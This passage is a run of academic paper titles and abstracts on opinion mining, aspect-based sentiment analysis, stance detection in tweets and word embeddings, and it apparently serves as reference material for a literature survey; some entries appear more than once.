Furthermore, we show that these vectors provide state-of-the-art performance on our test set for measuring syntactic and semantic word similarities. --- paper_title: Relevant Emotion Ranking from Text Constrained with Emotion Relationships paper_content: Text might contain or invoke multiple emotions with varying intensities. As such, emotion detection, to predict multiple emotions associated with a given text, can be cast into a multi-label classification problem. We would like to go one step further so that a ranked list of relevant emotions are generated where top ranked emotions are more intensely associated with text compared to lower ranked emotions, whereas the rankings of irrelevant emotions are not important. A novel framework of relevant emotion ranking is proposed to tackle the problem. In the framework, the objective loss function is designed elaborately so that both emotion prediction and rankings of only relevant emotions can be achieved. Moreover, we observe that some emotions cooccur more often while other emotions rarely co-exist. Such information is incorporated into the framework as constraints to improve the accuracy of emotion detection. Experimental results on two real-world corpora show that the proposed framework can effectively deal with emotion detection and performs remarkably better than the state-of-the-art emotion detection approaches and multi-label learning methods. --- paper_title: Deriving market intelligence from microblogs paper_content: Given their rapidly growing popularity, microblogs have become great sources of consumer opinions. However, in the face of unique properties and the massive volume of posts on microblogs, this paper proposes a framework that provides a compact numeric summarization of opinions on such platforms. The proposed framework is designed to cope with the following tasks: trendy topics detection, opinion classification, credibility assessment, and numeric summarization. An experiment is carried out on Twitter, the largest microblog website, to prove the effectiveness of the proposed framework. We find that the consideration of user credibility and opinion subjectivity is essential for aggregating microblog opinions. The proposed mechanism can effectively discover market intelligence (MI) for supporting decision-makers. --- paper_title: Double Embeddings and CNN-based Sequence Labeling for Aspect Extraction paper_content: One key task of fine-grained sentiment analysis of product reviews is to extract product aspects or features that users have expressed opinions on. This paper focuses on supervised aspect extraction using deep learning. Unlike other highly sophisticated supervised deep learning models, this paper proposes a novel and yet simple CNN model employing two types of pre-trained embeddings for aspect extraction: general-purpose embeddings and domain-specific embeddings. Without using any additional supervision, this model achieves surprisingly good results, outperforming state-of-the-art sophisticated existing methods. To our knowledge, this paper is the first to report such double embeddings based CNN model for aspect extraction and achieve very good results. --- paper_title: Stance and Sentiment in Tweets paper_content: We can often detect from a person's utterances whether he/she is in favor of or against a given target entity -- their stance towards the target. However, a person may express the same stance towards a target by using negative or positive language. Here for the first time we present a dataset of tweet--target pairs annotated for both stance and sentiment. The targets may or may not be referred to in the tweets, and they may or may not be the target of opinion in the tweets. Partitions of this dataset were used as training and test sets in a SemEval-2016 shared task competition. We propose a simple stance detection system that outperforms submissions from all 19 teams that participated in the shared task. Additionally, access to both stance and sentiment annotations allows us to explore several research questions. We show that while knowing the sentiment expressed by a tweet is beneficial for stance classification, it alone is not sufficient. Finally, we use additional unlabeled data through distant supervision techniques and word embeddings to further improve stance classification. --- paper_title: Latent aspect rating analysis without aspect keyword supervision paper_content: Mining detailed opinions buried in the vast amount of review text data is an important, yet quite challenging task with widespread applications in multiple domains. Latent Aspect Rating Analysis (LARA) refers to the task of inferring both opinion ratings on topical aspects (e.g., location, service of a hotel) and the relative weights reviewers have placed on each aspect based on review content and the associated overall ratings. A major limitation of previous work on LARA is the assumption of pre-specified aspects by keywords. However, the aspect information is not always available, and it may be difficult to pre-define appropriate aspects without a good knowledge about what aspects are actually commented on in the reviews. In this paper, we propose a unified generative model for LARA, which does not need pre-specified aspect keywords and simultaneously mines 1) latent topical aspects, 2) ratings on each identified aspect, and 3) weights placed on different aspects by a reviewer. Experiment results on two different review data sets demonstrate that the proposed model can effectively perform the Latent Aspect Rating Analysis task without the supervision of aspect keywords. Because of its generality, the proposed model can be applied to explore all kinds of opinionated text data containing overall sentiment judgments and support a wide range of interesting application tasks, such as aspect-based opinion summarization, personalized entity ranking and recommendation, and reviewer behavior analysis. --- paper_title: Multi-facet Rating of Product Reviews paper_content: Online product reviews are becoming increasingly available, and are being used more and more frequently by consumers in order to choose among competing products. Tools that rank competing products in terms of the satisfaction of consumers that have purchased the product before, are thus also becoming popular. We tackle the problem of rating (i.e., attributing a numerical score of satisfaction to) consumer reviews based on their textual content. We here focus on multi-facet review rating, i.e., on the case in which the review of a product (e.g., a hotel) must be rated several times, according to several aspects of the product (for a hotel: cleanliness, centrality of location, etc.). We explore several aspects of the problem, with special emphasis on how to generate vectorial representations of the text by means of POS tagging, sentiment analysis, and feature selection for ordinal regression learning. We present the results of experiments conducted on a dataset of more than 15,000 reviews that we have crawled from a popular hotel review site. --- paper_title: Opinion digger: an unsupervised opinion miner from unstructured product reviews paper_content: Mining customer reviews (opinion mining) has emerged as an interesting new research direction. Most of the reviewing websites such as Epinions.com provide some additional information on top of the review text and overall rating, including a set of predefined aspects and their ratings, and a rating guideline which shows the intended interpretation of the numerical ratings. However, the existing methods have ignored this additional information. We claim that using this information, which is freely available, along with the review text can effectively improve the accuracy of opinion mining. We propose an unsupervised method, called Opinion Digger, which extracts important aspects of a product and determines the overall consumer's satisfaction for each, by estimating a rating in the range from 1 to 5. We demonstrate the improved effectiveness of our methods on a real life dataset that we crawled from Epinions.com. --- paper_title: On the evaluation of document analysis components by recall, precision, and accuracy paper_content: In document analysis, it is common to prove the usefulness of a component by an experimental evaluation. By applying the respective algorithms to a test sample, effectiveness measures such as recall, precision, and accuracy are computed. The goal of such an evaluation is two-fold: on the one hand it shows that the absolute effectiveness of the algorithm is acceptable for practical use. On the other hand the evaluation can prove that the algorithm has a better or worse effectiveness than another algorithm. We argue that the experimental evaluation on relative small test sets-as is very common in document analysis has to be taken with extreme care from a statistical point of view. In fact, it is surprising how weak statements derived from such evaluations are. --- paper_title: ILDA: interdependent LDA model for learning latent aspects and their ratings from online product reviews paper_content: Today, more and more product reviews become available on the Internet, e.g., product review forums, discussion groups, and Blogs. However, it is almost impossible for a customer to read all of the different and possibly even contradictory opinions and make an informed decision. Therefore, mining online reviews (opinion mining) has emerged as an interesting new research direction. Extracting aspects and the corresponding ratings is an important challenge in opinion mining. An aspect is an attribute or component of a product, e.g. 'screen' for a digital camera. It is common that reviewers use different words to describe an aspect (e.g. 'LCD', 'display', 'screen'). A rating is an intended interpretation of the user satisfaction in terms of numerical values. Reviewers usually express the rating of an aspect by a set of sentiments, e.g. 'blurry screen'. In this paper we present three probabilistic graphical models which aim to extract aspects and corresponding ratings of products from online reviews. The first two models extend standard PLSI and LDA to generate a rated aspect summary of product reviews. As our main contribution, we introduce Interdependent Latent Dirichlet Allocation (ILDA) model. This model is more natural for our task since the underlying probabilistic assumptions (interdependency between aspects and ratings) are appropriate for our problem domain. We conduct experiments on a real life dataset, Epinions.com, demonstrating the improved effectiveness of the ILDA model in terms of the likelihood of a held-out test set, and the accuracy of aspects and aspect ratings. --- paper_title: An Unsupervised Aspect-Sentiment Model for Online Reviews paper_content: With the increase in popularity of online review sites comes a corresponding need for tools capable of extracting the information most important to the user from the plain text data. Due to the diversity in products and services being reviewed, supervised methods are often not practical. We present an unsuper-vised system for extracting aspects and determining sentiment in review text. The method is simple and flexible with regard to domain and language, and takes into account the influence of aspect on sentiment polarity, an issue largely ignored in previous literature. We demonstrate its effectiveness on both component tasks, where it achieves similar results to more complex semi-supervised methods that are restricted by their reliance on manual annotation and extensive knowledge sources. --- paper_title: Support or Oppose? Classifying Positions in Online Debates from Reply Activities and Opinion Expressions paper_content: We propose a method for the task of identifying the general positions of users in online debates, i.e., support or oppose the main topic of an online debate, by exploiting local information in their remarks within the debate. An online debate is a forum where each user post an opinion on a particular topic while other users state their positions by posting their remarks within the debate. The supporting or opposing remarks are made by directly replying to the opinion, or indirectly to other remarks (to express local agreement or disagreement), which makes the task of identifying users' general positions difficult. A prior study has shown that a link-based method, which completely ignores the content of the remarks, can achieve higher accuracy for the identification task than methods based solely on the contents of the remarks. In this paper, we show that utilizing the textual content of the remarks into the link-based method can yield higher accuracy in the identification task. --- paper_title: Jointly Modeling Aspects and Opinions with a MaxEnt-LDA Hybrid paper_content: Discovering and summarizing opinions from online reviews is an important and challenging task. A commonly-adopted framework generates structured review summaries with aspects and opinions. Recently topic models have been used to identify meaningful review aspects, but existing topic models do not identify aspect-specific opinion words. In this paper, we propose a MaxEnt-LDA hybrid model to jointly discover both aspects and aspect-specific opinion words. We show that with a relatively small amount of training data, our model can effectively identify aspect and opinion words simultaneously. We also demonstrate the domain adaptability of our model. --- paper_title: Objective Criteria for the Evaluation of Clustering Methods paper_content: Abstract Many intuitively appealing methods have been suggested for clustering data, however, interpretation of their results has been hindered by the lack of objective criteria. This article proposes several criteria which isolate specific aspects of the performance of a method, such as its retrieval of inherent structure, its sensitivity to resampling and the stability of its results in the light of new data. These criteria depend on a measure of similarity between two different clusterings of the same set of data; the measure essentially considers how each pair of data points is assigned in each clustering. --- paper_title: ILDA: interdependent LDA model for learning latent aspects and their ratings from online product reviews paper_content: Today, more and more product reviews become available on the Internet, e.g., product review forums, discussion groups, and Blogs. However, it is almost impossible for a customer to read all of the different and possibly even contradictory opinions and make an informed decision. Therefore, mining online reviews (opinion mining) has emerged as an interesting new research direction. Extracting aspects and the corresponding ratings is an important challenge in opinion mining. An aspect is an attribute or component of a product, e.g. 'screen' for a digital camera. It is common that reviewers use different words to describe an aspect (e.g. 'LCD', 'display', 'screen'). A rating is an intended interpretation of the user satisfaction in terms of numerical values. Reviewers usually express the rating of an aspect by a set of sentiments, e.g. 'blurry screen'. In this paper we present three probabilistic graphical models which aim to extract aspects and corresponding ratings of products from online reviews. The first two models extend standard PLSI and LDA to generate a rated aspect summary of product reviews. As our main contribution, we introduce Interdependent Latent Dirichlet Allocation (ILDA) model. This model is more natural for our task since the underlying probabilistic assumptions (interdependency between aspects and ratings) are appropriate for our problem domain. We conduct experiments on a real life dataset, Epinions.com, demonstrating the improved effectiveness of the ILDA model in terms of the likelihood of a held-out test set, and the accuracy of aspects and aspect ratings. --- paper_title: JU_NLP at SemEval-2016 Task 6: Detecting Stance in Tweets using Support Vector Machines paper_content: We describe the system submitted to the SemEval-2016 for detecting stance in tweets (Task 6, Subtask A). One of the main goals of stance detection is to automatically determine the stance of a tweet towards a specific target as ‘FAVOR’, ‘AGAINST’, or ‘NONE’. We developed a supervised system using Support Vector Machines to identify the stance by analyzing various lexical and semantic features. The average F1 score achieved by our system is 60.60. --- paper_title: Fine-grained Opinion Mining with Recurrent Neural Networks and Word Embeddings paper_content: The tasks in fine-grained opinion mining can be regarded as either a token-level sequence labeling problem or as a semantic compositional task. We propose a general class of discriminative models based on recurrent neural networks (RNNs) and word embeddings that can be successfully applied to such tasks without any taskspecific feature engineering effort. Our experimental results on the task of opinion target identification show that RNNs, without using any hand-crafted features, outperform feature-rich CRF-based models. Our framework is flexible, allows us to incorporate other linguistic features, and achieves results that rival the top performing systems in SemEval-2014. --- paper_title: Aspect Aware Optimized Opinion Analysis of Online Product Reviews paper_content: Now-a-days social media and micro blogging sites are the most popular form of communication. The most useful application on these platforms is Opinion mining or Sentiment classification of the users. Here, in this work an automated method has been proposed to analyze and summarize opinions on a product in a structured, product aspect based manner. The proposed method will help future potential buyers to acquire complete idea, from a comprehensible representation of the reviews, without going through all the reviews manually. --- paper_title: Semantic dependent word pairs generative model for fine-grained product feature mining paper_content: In the field of opinion mining, extraction of fine-grained product feature is a challenging problem. Noun is the most important features to represent product features. Generative model such as the latent Dirichlet allocation (LDA) has been used for detecting keyword clusters in document corpus. As adjectives often dominate review corpus, they are often excluded from the vocabulary in such generative model for opinion sentiment analysis. On the other hand, adjectives provide useful context for noun features as they are often semantically related to the nouns. To take advantage of such semantic relations, dependency tree is constructed to extract pairs of noun and adjective with semantic dependency relation. We propose a semantic dependent word pairs generative model for pairs of noun and adjective for each sentence. Product features and their corresponding adjectives are simultaneously clustered into distinct groups which enable improved accuracy of product features as well as providing clustered adjectives. Experimental results demonstrated the advantage of our models with lower perplexity, average cluster entropies, compared to baseline models based on LDA. Highly semantic cohesive, descriptive and discriminative fine-grained product features are obtained automatically. --- paper_title: Cross-Target Stance Classification with Self-Attention Networks paper_content: In stance classification, the target on which the stance is made defines the boundary of the task, and a classifier is usually trained for prediction on the same target. In this work, we explore the potential for generalizing classifiers between different targets, and propose a neural model that can apply what has been learned from a source target to a destination target. We show that our model can find useful information shared between relevant targets which improves generalization in certain scenarios. --- paper_title: DeepStance at SemEval-2016 Task 6: Detecting Stance in Tweets Using Character and Word-Level CNNs paper_content: This paper describes our approach for the Detecting Stance in Tweets task (SemEval-2016 Task 6). We utilized recent advances in short text categorization using deep learning to create word-level and character-level models. The choice between word-level and character-level models in each particular case was informed through validation performance. Our final system is a combination of classifiers using word-level or character-level models. We also employed novel data augmentation techniques to expand and diversify our training dataset, thus making our system more robust. Our system achieved a macro-average precision, recall and F1-scores of 0.67, 0.61 and 0.635 respectively. --- paper_title: Jointly Modeling Aspects and Opinions with a MaxEnt-LDA Hybrid paper_content: Discovering and summarizing opinions from online reviews is an important and challenging task. A commonly-adopted framework generates structured review summaries with aspects and opinions. Recently topic models have been used to identify meaningful review aspects, but existing topic models do not identify aspect-specific opinion words. In this paper, we propose a MaxEnt-LDA hybrid model to jointly discover both aspects and aspect-specific opinion words. We show that with a relatively small amount of training data, our model can effectively identify aspect and opinion words simultaneously. We also demonstrate the domain adaptability of our model. --- paper_title: Multi-task Coupled Attentions for Category-specific Aspect and Opinion Terms Co-extraction paper_content: In aspect-based sentiment analysis, most existing methods either focus on aspect/opinion terms extraction or aspect terms categorization. However, each task by itself only provides partial information to end users. To generate more detailed and structured opinion analysis, we propose a finer-grained problem, which we call category-specific aspect and opinion terms extraction. This problem involves the identification of aspect and opinion terms within each sentence, as well as the categorization of the identified terms. To this end, we propose an end-to-end multi-task attention model, where each task corresponds to aspect/opinion terms extraction for a specific category. Our model benefits from exploring the commonalities and relationships among different tasks to address the data sparsity issue. We demonstrate its state-of-the-art performance on three benchmark datasets. --- paper_title: Recursive Neural Conditional Random Fields for Aspect-based Sentiment Analysis paper_content: In aspect-based sentiment analysis, extracting aspect terms along with the opinions being expressed from user-generated content is one of the most important subtasks. Previous studies have shown that exploiting connections between aspect and opinion terms is promising for this task. In this paper, we propose a novel joint model that integrates recursive neural networks and conditional random fields into a unified framework for explicit aspect and opinion terms co-extraction. The proposed model learns high-level discriminative features and double propagate information between aspect and opinion terms, simultaneously. Moreover, it is flexible to incorporate hand-crafted features into the proposed model to further boost its information extraction performance. Experimental results on the SemEval Challenge 2014 dataset show the superiority of our proposed model over several baseline methods as well as the winning systems of the challenge. --- paper_title: Latent aspect rating analysis without aspect keyword supervision paper_content: Mining detailed opinions buried in the vast amount of review text data is an important, yet quite challenging task with widespread applications in multiple domains. Latent Aspect Rating Analysis (LARA) refers to the task of inferring both opinion ratings on topical aspects (e.g., location, service of a hotel) and the relative weights reviewers have placed on each aspect based on review content and the associated overall ratings. A major limitation of previous work on LARA is the assumption of pre-specified aspects by keywords. However, the aspect information is not always available, and it may be difficult to pre-define appropriate aspects without a good knowledge about what aspects are actually commented on in the reviews. In this paper, we propose a unified generative model for LARA, which does not need pre-specified aspect keywords and simultaneously mines 1) latent topical aspects, 2) ratings on each identified aspect, and 3) weights placed on different aspects by a reviewer. Experiment results on two different review data sets demonstrate that the proposed model can effectively perform the Latent Aspect Rating Analysis task without the supervision of aspect keywords. Because of its generality, the proposed model can be applied to explore all kinds of opinionated text data containing overall sentiment judgments and support a wide range of interesting application tasks, such as aspect-based opinion summarization, personalized entity ranking and recommendation, and reviewer behavior analysis. --- paper_title: Exploiting coherence for the simultaneous discovery of latent facets and associated sentiments paper_content: Facet-based sentiment analysis involves discovering the ::: latent facets, sentiments and their associations. Traditional facet-based sentiment analysis algorithms typically perform the various tasks in sequence, and fail to take advantage of the mutual reinforcement of the tasks. Additionally,inferring sentiment levels typically requires domain knowledge or human intervention. In this paper, we propose aseries of probabilistic models that jointly discover latent facets and sentiment topics, and also order the sentiment topics with respect to a multi-point scale, in a language and domain independent manner. This is achieved by simultaneously capturing both short-range syntactic structure and long range semantic dependencies between the sentiment and facet words. The models further incorporate coherence in reviews, where reviewers dwell on one facet or sentiment level before moving on, for more accurate facet and sentiment discovery. For reviews which are supplemented with ratings, our models automatically order the latent sentiment topics, without requiring seed-words or domain-knowledge. To the best of our knowledge, our work is the first attempt to combine the notions of syntactic and semantic dependencies ::: in the domain of review mining. Further, the concept of ::: facet and sentiment coherence has not been explored earlier either. Extensive experimental results on real world review data show that the proposed models outperform various state of the art baselines for facet-based sentiment analysis. --- paper_title: Multi-facet Rating of Product Reviews paper_content: Online product reviews are becoming increasingly available, and are being used more and more frequently by consumers in order to choose among competing products. Tools that rank competing products in terms of the satisfaction of consumers that have purchased the product before, are thus also becoming popular. We tackle the problem of rating (i.e., attributing a numerical score of satisfaction to) consumer reviews based on their textual content. We here focus on multi-facet review rating, i.e., on the case in which the review of a product (e.g., a hotel) must be rated several times, according to several aspects of the product (for a hotel: cleanliness, centrality of location, etc.). We explore several aspects of the problem, with special emphasis on how to generate vectorial representations of the text by means of POS tagging, sentiment analysis, and feature selection for ordinal regression learning. We present the results of experiments conducted on a dataset of more than 15,000 reviews that we have crawled from a popular hotel review site. --- paper_title: OpinionMiner: a novel machine learning system for web opinion mining and extraction paper_content: Merchants selling products on the Web often ask their customers to share their opinions and hands-on experiences on products they have purchased. Unfortunately, reading through all customer reviews is difficult, especially for popular items, the number of reviews can be up to hundreds or even thousands. This makes it difficult for a potential customer to read them to make an informed decision. The OpinionMiner system designed in this work aims to mine customer reviews of a product and extract high detailed product entities on which reviewers express their opinions. Opinion expressions are identified and opinion orientations for each recognized product entity are classified as positive or negative. Different from previous approaches that employed rule-based or statistical techniques, we propose a novel machine learning approach built under the framework of lexicalized HMMs. The approach naturally integrates multiple important linguistic features into automatic learning. In this paper, we describe the architecture and main components of the system. The evaluation of the proposed method is presented based on processing the online product reviews from Amazon and other publicly available datasets. --- paper_title: Mining and summarizing customer reviews paper_content: Merchants selling products on the Web often ask their customers to review the products that they have purchased and the associated services. As e-commerce is becoming more and more popular, the number of customer reviews that a product receives grows rapidly. For a popular product, the number of reviews can be in hundreds or even thousands. This makes it difficult for a potential customer to read them to make an informed decision on whether to purchase the product. It also makes it difficult for the manufacturer of the product to keep track and to manage customer opinions. For the manufacturer, there are additional difficulties because many merchant sites may sell the same product and the manufacturer normally produces many kinds of products. In this research, we aim to mine and to summarize all the customer reviews of a product. This summarization task is different from traditional text summarization because we only mine the features of the product on which the customers have expressed their opinions and whether the opinions are positive or negative. We do not summarize the reviews by selecting a subset or rewrite some of the original sentences from the reviews to capture the main points as in the classic text summarization. Our task is performed in three steps: (1) mining product features that have been commented on by customers; (2) identifying opinion sentences in each review and deciding whether each opinion sentence is positive or negative; (3) summarizing the results. This paper proposes several novel techniques to perform these tasks. Our experimental results using reviews of a number of products sold online demonstrate the effectiveness of the techniques. --- paper_title: Opinion digger: an unsupervised opinion miner from unstructured product reviews paper_content: Mining customer reviews (opinion mining) has emerged as an interesting new research direction. Most of the reviewing websites such as Epinions.com provide some additional information on top of the review text and overall rating, including a set of predefined aspects and their ratings, and a rating guideline which shows the intended interpretation of the numerical ratings. However, the existing methods have ignored this additional information. We claim that using this information, which is freely available, along with the review text can effectively improve the accuracy of opinion mining. We propose an unsupervised method, called Opinion Digger, which extracts important aspects of a product and determines the overall consumer's satisfaction for each, by estimating a rating in the range from 1 to 5. We demonstrate the improved effectiveness of our methods on a real life dataset that we crawled from Epinions.com. --- paper_title: pkudblab at SemEval-2016 Task 6 : A Specific Convolutional Neural Network System for Effective Stance Detection paper_content: In this paper, we develop a convolutional neural network for stance detection in tweets. According to the official results, our system ranks 1 on subtask B (among 9 teams) and ranks 2 on subtask A (among 19 teams) on the twitter test set of SemEval2016 Task 6. The main contribution of our work is as follows. We design a ”vote scheme” for prediction instead of predicting when the accuracy of validation set reaches its maximum. Besides, we make some improvement on the specific subtasks. For subtask A, we separate datasets into five sub-datasets according to their targets, and train and test five separate models. For subtask B, we establish a two-class training dataset from the official domain corpus, and then modify the softmax layer to perform three-class classification. Our system can be easily re-implemented and optimized for other related tasks. --- paper_title: Aspect Term Extraction with History Attention and Selective Transformation paper_content: Aspect Term Extraction (ATE), a key sub-task in Aspect-Based Sentiment Analysis, aims to extract explicit aspect expressions from online user reviews. We present a new framework for tackling ATE. It can exploit two useful clues, namely opinion summary and aspect detection history. Opinion summary is distilled from the whole input sentence, conditioned on each current token for aspect prediction, and thus the tailor-made summary can help aspect prediction on this token. Another clue is the information of aspect detection history, and it is distilled from the previous aspect predictions so as to leverage the coordinate structure and tagging schema constraints to upgrade the aspect prediction. Experimental results over four benchmark datasets clearly demonstrate that our framework can outperform all state-of-the-art methods. --- paper_title: Structure-Aware Review Mining and Summarization paper_content: In this paper, we focus on object feature based review summarization. Different from most of previous work with linguistic rules or statistical methods, we formulate the review mining task as a joint structure tagging problem. We propose a new machine learning framework based on Conditional Random Fields (CRFs). It can employ rich features to jointly extract positive opinions, negative opinions and object features for review sentences. The linguistic structure can be naturally integrated into model representation. Besides linear-chain structure, we also investigate conjunction structure and syntactic tree structure in this framework. Through extensive experiments on movie review and product review data sets, we show that structure-aware models outperform many state-of-the-art approaches to review mining. --- paper_title: A Joint Model of Text and Aspect Ratings for Sentiment Summarization paper_content: Online reviews are often accompanied with numerical ratings provided by users for a set of service or product aspects. We propose a statistical model which is able to discover corresponding topics in text and extract textual evidence from reviews supporting each of these aspect ratings ‐ a fundamental problem in aspect-based sentiment summarization (Hu and Liu, 2004a). Our model achieves high accuracy, without any explicitly labeled data except the user provided opinion ratings. The proposed approach is general and can be used for segmentation in other applications where sequential data is accompanied with correlated signals. --- paper_title: An Approach Based on Tree Kernels for Opinion Mining of Online Product Reviews paper_content: Opinion mining is a challenging task to identify the opinions or sentiments underlying user generated contents, such as online product reviews, blogs, discussion forums, etc. Previous studies that adopt machine learning algorithms mainly focus on designing effective features for this complex task. This paper presents our approach based on tree kernels for opinion mining of online product reviews. Tree kernels alleviate the complexity of feature selection and generate effective features to satisfy the special requirements in opinion mining. In this paper, we define several tree kernels for sentiment expression extraction and sentiment classification, which are subtasks of opinion mining. Our proposed tree kernels encode not only syntactic structure information, but also sentiment related information, such as sentiment boundary and sentiment polarity, which are important features to opinion mining. Experimental results on a benchmark data set indicate that tree kernels can significantly improve the performance of both sentiment expression extraction and sentiment classification. Besides, a linear combination of our proposed tree kernels and traditional feature vector kernel achieves the best performances using the benchmark data set. --- paper_title: Dependency-Tree Based Convolutional Neural Networks for Aspect Term Extraction paper_content: Aspect term extraction is one of the fundamental subtasks in aspect-based sentiment analysis. Previous work has shown that sentences’ dependency information is critical and has been widely used for opinion mining. With recent success of deep learning in natural language processing (NLP), recurrent neural network (RNN) has been proposed for aspect term extraction and shows the superiority over feature-rich CRFs based models. However, because RNN is a sequential model, it can not effectively capture tree-based dependency information of sentences thus limiting its practicability. In order to effectively exploit sentences’ dependency information and leverage the effectiveness of deep learning, we propose a novel dependency-tree based convolutional stacked neural network (DTBCSNN) for aspect term extraction, in which tree-based convolution is introduced over sentences’ dependency parse trees to capture syntactic features. Our model is an end-to-end deep learning based model and it does not need any human-crafted features. Furthermore, our model is flexible to incorporate extra linguistic features to further boost the model performance. To substantiate, results from experiments on SemEval2014 Task4 datasets (reviews on restaurant and laptop domain) show that our model achieves outstanding performance and outperforms the RNN and CRF baselines. --- paper_title: An Aspect-Sentiment Pair Extraction Approach Based on Latent Dirichlet Allocation paper_content: Online user reviews have a great influence on decision-making process of customers and product sales of companies. However, it is very difficult to obtain user sentiments among huge volume of data on the web consequently; sentiment analysis has gained great importance in terms of analyzing data automatically. On the other hand, sentiment analysis divides itself into branches and can be performed better with aspect level analysis. In this paper, we proposed to extract aspect-sentiment pairs from a Turkish reviews dataset. The proposed task is the fundamental and indeed the critical step of the aspect level sentiment analysis. While extracting aspect-sentiment pairs, an unsupervised topic model Latent Dirichlet Allocation (LDA) is used. With LDA, aspect-sentiment pairs from user reviews are extracted with 0.86 average precision based on ranked list. The aspect-sentiment pair extraction problem is first time realized with LDA on a real-world Turkish user reviews dataset. The experimental results show that LDA is effective and robust in aspect-sentiment pair extraction from user reviews. --- paper_title: Twitter Stance Detection — A Subjectivity and Sentiment Polarity Inspired Two-Phase Approach paper_content: The problem of stance detection from Twitter tweets, has recently gained significant research attention. This paper addresses the problem of detecting the stance of given tweets, with respect to given topics, from user-generated text (tweets). We use the SemEval 2016 stance detection task dataset. The labels comprise of positive, negative and neutral stances, with respect to given topics. We develop a two-phase feature-driven model. First, the tweets are classified as neutral vs. non-neutral. Next, non-neutral tweets are classified as positive vs. negative. The first phase of our work draws inspiration from the subjectivity classification and the second phase from the sentiment classification literature. We propose the use of two novel features, which along with our streamlined approach, plays a key role deriving the strong results that we obtain. We use traditional support vector machine (SVM) based machine learning. Our system (F-score: 74.44 for SemEval 2016 Task A and 61.57 for Task B) significantly outperforms the state of the art (F-score: 68.98 for Task A and 56.28 for Task B). While the performance of the system on Task A shows the effectiveness of our model for targets on which the model was trained upon, the performance of the system on Task B shows the generalization that our model achieves. The stance detection problem in Twitter is applicable for user opinion mining related applications and other social influence and information flow modeling applications, in real life. --- paper_title: Distributed Representations of Words and Phrases and their Compositionality paper_content: The recently introduced continuous Skip-gram model is an efficient method for learning high-quality distributed vector representations that capture a large number of precise syntactic and semantic word relationships. In this paper we present several extensions that improve both the quality of the vectors and the training speed. By subsampling of the frequent words we obtain significant speedup and also learn more regular word representations. We also describe a simple alternative to the hierarchical softmax called negative sampling. ::: ::: An inherent limitation of word representations is their indifference to word order and their inability to represent idiomatic phrases. For example, the meanings of "Canada" and "Air" cannot be easily combined to obtain "Air Canada". Motivated by this example, we present a simple method for finding phrases in text, and show that learning good vector representations for millions of phrases is possible. --- paper_title: Efficient Estimation of Word Representations in Vector Space paper_content: We propose two novel model architectures for computing continuous vector representations of words from very large data sets. The quality of these representations is measured in a word similarity task, and the results are compared to the previously best performing techniques based on different types of neural networks. We observe large improvements in accuracy at much lower computational cost, i.e. it takes less than a day to learn high quality word vectors from a 1.6 billion words data set. Furthermore, we show that these vectors provide state-of-the-art performance on our test set for measuring syntactic and semantic word similarities. --- paper_title: Aspect Term Extraction Based on MFE-CRF paper_content: This paper is focused on aspect term extraction in aspect-based sentiment analysis (ABSA), which is one of the hot spots in natural language processing (NLP). This paper proposes MFE-CRF that introduces Multi-Feature Embedding (MFE) clustering based on the Conditional Random Field (CRF) model to improve the effect of aspect term extraction in ABSA. First, Multi-Feature Embedding (MFE) is proposed to improve the text representation and capture more semantic information from text. Then the authors use kmeans++ algorithm to obtain MFE and word clustering to enrich the position features of CRF. Finally, the clustering classes of MFE and word embedding are set as the additional position features to train the model of CRF for aspect term extraction. The experiments on SemEval datasets validate the effectiveness of this model. The results of different models indicate that MFE-CRF can greatly improve the Recall rate of CRF model. Additionally, the Precision rate also is increased obviously when the semantics of text is complex. --- paper_title: Aspect and sentiment unification model for online review analysis paper_content: User-generated reviews on the Web contain sentiments about detailed aspects of products and services. However, most of the reviews are plain text and thus require much effort to obtain information about relevant details. In this paper, we tackle the problem of automatically discovering what aspects are evaluated in reviews and how sentiments for different aspects are expressed. We first propose Sentence-LDA (SLDA), a probabilistic generative model that assumes all words in a single sentence are generated from one aspect. We then extend SLDA to Aspect and Sentiment Unification Model (ASUM), which incorporates aspect and sentiment together to model sentiments toward different aspects. ASUM discovers pairs of {aspect, sentiment} which we call senti-aspects. We applied SLDA and ASUM to reviews of electronic devices and restaurants. The results show that the aspects discovered by SLDA match evaluative details of the reviews, and the senti-aspects found by ASUM capture important aspects that are closely coupled with a sentiment. The results of sentiment classification show that ASUM outperforms other generative models and comes close to supervised classification methods. One important advantage of ASUM is that it does not require any sentiment labels of the reviews, which are often expensive to obtain. --- paper_title: Double Embeddings and CNN-based Sequence Labeling for Aspect Extraction paper_content: One key task of fine-grained sentiment analysis of product reviews is to extract product aspects or features that users have expressed opinions on. This paper focuses on supervised aspect extraction using deep learning. Unlike other highly sophisticated supervised deep learning models, this paper proposes a novel and yet simple CNN model employing two types of pre-trained embeddings for aspect extraction: general-purpose embeddings and domain-specific embeddings. Without using any additional supervision, this model achieves surprisingly good results, outperforming state-of-the-art sophisticated existing methods. To our knowledge, this paper is the first to report such double embeddings based CNN model for aspect extraction and achieve very good results. --- paper_title: Stance and Sentiment in Tweets paper_content: We can often detect from a person's utterances whether he/she is in favor of or against a given target entity -- their stance towards the target. However, a person may express the same stance towards a target by using negative or positive language. Here for the first time we present a dataset of tweet--target pairs annotated for both stance and sentiment. The targets may or may not be referred to in the tweets, and they may or may not be the target of opinion in the tweets. Partitions of this dataset were used as training and test sets in a SemEval-2016 shared task competition. We propose a simple stance detection system that outperforms submissions from all 19 teams that participated in the shared task. Additionally, access to both stance and sentiment annotations allows us to explore several research questions. We show that while knowing the sentiment expressed by a tweet is beneficial for stance classification, it alone is not sufficient. Finally, we use additional unlabeled data through distant supervision techniques and word embeddings to further improve stance classification. --- paper_title: Extracting Product Features And Opinions From Reviews paper_content: Consumers are often forced to wade through many on-line reviews in order to make an informed product choice. This paper introduces Opine, an unsupervised information-extraction system which mines reviews in order to build a model of important product features, their evaluation by reviewers, and their relative quality across products.Compared to previous work, Opine achieves 22% higher precision (with only 3% lower recall) on the feature extraction task. Opine's novel use of relaxation labeling for finding the semantic orientation of words in context leads to strong performance on the tasks of finding opinion phrases and their polarity. --- paper_title: Ideological Perspective Detection Using Semantic Features paper_content: In this paper, we propose the use of word sense disambiguation and latent semantic features to automatically identify a person’s perspective from his/her written text. We run an Amazon Mechanical Turk experiment where we ask Turkers to answer a set of constrained and open-ended political questions drawn from the American National Election Studies (ANES). We then extract the proposed features from the answers to the open-ended questions and use them to predict the answer to one of the constrained questions, namely, their preferred Presidential Candidate. In addition to this newly created dataset, we also evaluate our proposed approach on a second standard dataset of “Ideological-Debates”. This latter dataset contains topics from four domains: Abortion, Creationism, Gun Rights and GayRights. Experimental results show that using word sense disambiguation and latentsemantics, whether separately or combined, beats the majority and random baselines on the cross-validation and held-out-test sets for both 